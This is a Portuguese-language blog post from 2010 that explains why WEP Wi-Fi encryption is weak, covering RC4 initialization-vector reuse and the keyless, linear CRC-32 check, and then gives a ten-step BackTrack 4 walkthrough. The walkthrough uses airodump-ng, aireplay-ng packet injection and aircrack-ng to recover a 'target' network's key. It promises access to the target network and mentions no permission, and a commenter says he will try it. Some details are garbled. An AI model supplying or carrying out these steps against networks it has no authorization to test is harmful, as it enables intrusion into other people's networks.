Backtrack 4 - Fazendo Pentesting em WEP em 3 minutos e porque é tão insegura a WEP.
Mas porque redes com criptografia WEP são tão vulneráveis?
Após vários estudos e testes realizados com este protocolo, encontraram-se algumas vulnerabilidades e falhas que fizeram com que o WEP perdesse quase toda a sua credibilidade.
No WEP, os dois parâmetros que servem de entrada para o algoritmo RC4 são a chave secreta k de 40 bits ou 104 bits e um vector de inicialização de 24 bits. A partir desses dois parâmetros, o algoritmo gera uma seqüência criptografada RC4 (k,v).
Porém, como no WEP a chave secreta que é a mesma utilizada por todos os usuários de uma mesma rede, onde devemos ter um vetor de inicialização diferente para cada pacote a fim de evitar a repetição de uma mesma seqüência RC4 . Essa repetição de seqüência é extremamente indesejável pois dá margem a ataques bem sucedidos e conseqüente descoberta de pacotes por eventuais intrusos.
Além disso, há também uma forte recomendação para que seja feita a troca das chaves secretas periodicamente aumentando-se com isso a segurança da rede. Porém, essa troca quando é feita, é realizada manualmente de maneira pouco prática e por vezes inviável, quando se trata de redes com um número muito alto de usuários.
E ainda uma falha do WEP constatada e provada através de ataques bem sucedidos é a natureza de sua função detectora de erros. A CRC-32 é uma função linear e que não possui chave. Essas duas características tornam o protocolo suscetível a dois tipos de ataques prejudiciais e indesejáveis: é possível fazer uma modificação de mensagens que eventualmente tenham sido capturadas no meio do caminho sem que isso seja descoberto pelo receptor final devido a linearidade da função detectora de erros(MITM Man The Of Middle - O homem do meio), e além disso, pelo fato da função não possuir uma chave, é também possível descobrir uma seqüência secreta RC4 e de posse desta ser autenticado na rede e introduzir mensagens clandestinas nesta (Injeção de Pacotes).
Passo a Passo:
Instruções que são colocados dentro de aspas e com MAIUSCULAS exigem que você substitua com dados reais
1. Faça o Download do BackTrack 4 e grave em DVD
2. Dê Boot com BackTrack 4 e inicie a GUI digitando “startx”
3. Abra um “Konsole” e digite “airmon-ng”, lembre-se da sua interface de rede wireless (geralmente wlan0)
4. Digite “airodump-ng INTERFACE”
5. Será mostrado abaixo seu BSSID, ESSID, e channel da rede alvo.
6. Digite “airodump-ng -w wep -c CHANNEL –bssid BSSID INTERFACE”
7. Abra um novo console “Konsole” e digite "aireplay-ng -1 0 -a BSSID INTERFACE”
8. Abra um novo console “Konsole” e digite "aireplay-ng -3 -b BSSID INTERFACE”
9. Aguarde até as informações chegarem próximo (mais ou menos) até 30000.
10. Digite “aircrack-ng wep-01.cap INTERFACE”
Você terá conseguido o acesso a rede do seu alvo.
Uma das soluções que foi cogitada foi a substituição da CRC-32 por uma função de hash MD5 ou SHA-1 por exemplo. No entanto, esta seria uma solução muito cara além do que, tornaria a execução do protocolo pelos atuais processadores muito lenta.
Uma outra solução discutida foi descartar os primeiros 256 bytes da saída do gerador de números pseudo-aleatórios utilizado na criação dos vetores de inicialização. Isso seria feito devido a alta correlação dos primeiros bits exalados pelo RC4 com a chave. Porém, essa solução mostrou-se também muito cara e para muitas aplicações, inviável de ser implementada.
segunda-feira, 25 de outubro de 2010
Assinar:
Postar comentários (Atom)
1 comentários:
Cara vou testa aqui pra ver se da certo (H)
Postar um comentário